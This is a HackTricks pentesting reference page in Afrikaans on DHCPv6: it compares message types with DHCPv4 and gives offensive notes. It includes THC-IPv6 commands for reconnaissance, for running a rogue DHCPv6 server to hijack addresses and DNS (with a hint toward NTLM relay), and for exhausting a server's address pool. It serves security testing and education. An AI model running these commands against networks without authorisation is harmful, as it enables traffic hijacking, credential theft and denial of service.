DHCPv6

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

DHCPv6 vs. DHCPv4 Message Types Comparison

’n Vergelykende oorsig van DHCPv6- en DHCPv4-boodskaptipe word in die tabel hieronder aangebied:

DHCPv6 boodskaptipeDHCPv4 boodskaptipe
Solicit (1)DHCPDISCOVER
Advertise (2)DHCPOFFER
Request (3), Renew (5), Rebind (6)DHCPREQUEST
Reply (7)DHCPACK / DHCPNAK
Release (8)DHCPRELEASE
Information-Request (11)DHCPINFORM
Decline (9)DHCPDECLINE
Confirm (4)none
Reconfigure (10)DHCPFORCERENEW
Relay-Forw (12), Relay-Reply (13)none

Gedetailleerde uitleg van DHCPv6-boodskaptipe:

  1. Solicit (1): Deur ’n DHCPv6-kliënt geïnisieer om beskikbare bedieners te vind.
  2. Advertise (2): Deur bedieners gestuur as antwoord op ’n Solicit, wat beskikbaarheid vir DHCP-diens aandui.
  3. Request (3): Kliënte gebruik dit om IP-adresse of voorvoegsels van ’n spesifieke bediener aan te vra.
  4. Confirm (4): Deur ’n kliënt gebruik om te verifieer of die toegewezen adresse steeds geldig is op die netwerk, gewoonlik na ’n netwerkverandering.
  5. Renew (5): Kliënte stuur dit na die oorspronklike bediener om adresleeftyd te verleng of konfigurasies op te dateer.
  6. Rebind (6): Gestuur na enige bediener om adresleeftyd te verleng of konfigurasies op te dateer, veral wanneer daar geen reaksie op ’n Renew is nie.
  7. Reply (7): Bedieners gebruik dit om adresse, konfigurasieparameters te verskaf, of om boodskappe soos Release of Decline te erken.
  8. Release (8): Kliënte vertel die bediener om een of meer toegewezen adresse nie meer te gebruik nie.
  9. Decline (9): Deur kliënte gestuur om te rapporteer dat toegewezen adresse in konflik op die netwerk is.
  10. Reconfigure (10): Bedieners dryf kliënte aan om transaksies te begin vir nuwe of opgedateerde konfigurasies.
  11. Information-Request (11): Kliënte versoek konfigurasieparameters sonder IP-adrestoewysing.
  12. Relay-Forw (12): Relay-agente stuur boodskappe na bedieners.
  13. Relay-Repl (13): Bedieners antwoord aan relay-agente, wat dan die boodskap aan die kliënt aflewer.

Vinnige protokolnotas (Aanvallend)

  • DHCPv6-kliënte gebruik UDP-poort 546 en bedieners/relays gebruik UDP-poort 547.
  • Kliënte stuur Solicit na All_DHCP_Relay_Agents_and_Servers (ff02::1:2); bedieners/relays luister daar. All_DHCP_Servers is ff05::1:3.
  • Kliënt- en bedieneridentiteite word in OPTION_CLIENTID en OPTION_SERVERID gedra met behulp van DUIDs. Dit is handig vir fingerprinting van dieselfde host oor adresveranderinge.
  • Adrestoewysing word versoek met IA_NA (nie-tydelike adres) en prefix-delegering met IA_PD (downstream-router-voorvoegsel).

Vinnige verkenning

# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'

# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>

Skelm DHCPv6 Server (adres/DNS Hijack)

# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>

Dit is ’n generiese on-link rogue DHCPv6-bediener. Op Windows/AD-netwerke, koppel dit aan hoërvlak relays (sien die IPv6-bladsy) as jy NTLM relay primitives wil hê.

Pool-uitputting / DHCPv6-uithongering

# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>

Reconfigure-boodskap kanttekening

DHCPv6 Reconfigure word nie blindelings aanvaar nie: kliënte aanvaar dit slegs as hulle uitdruklik OPTION_RECONF_ACCEPT gestuur het. Volgens verstek is ’n kliënt onwillig om Reconfigure-boodskappe te aanvaar, so onbetroubare Reconfigure-aanvalle misluk dikwels tensy jy daardie opsie waarneem/induseer.

Pentesting IPv6

Verwysings

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks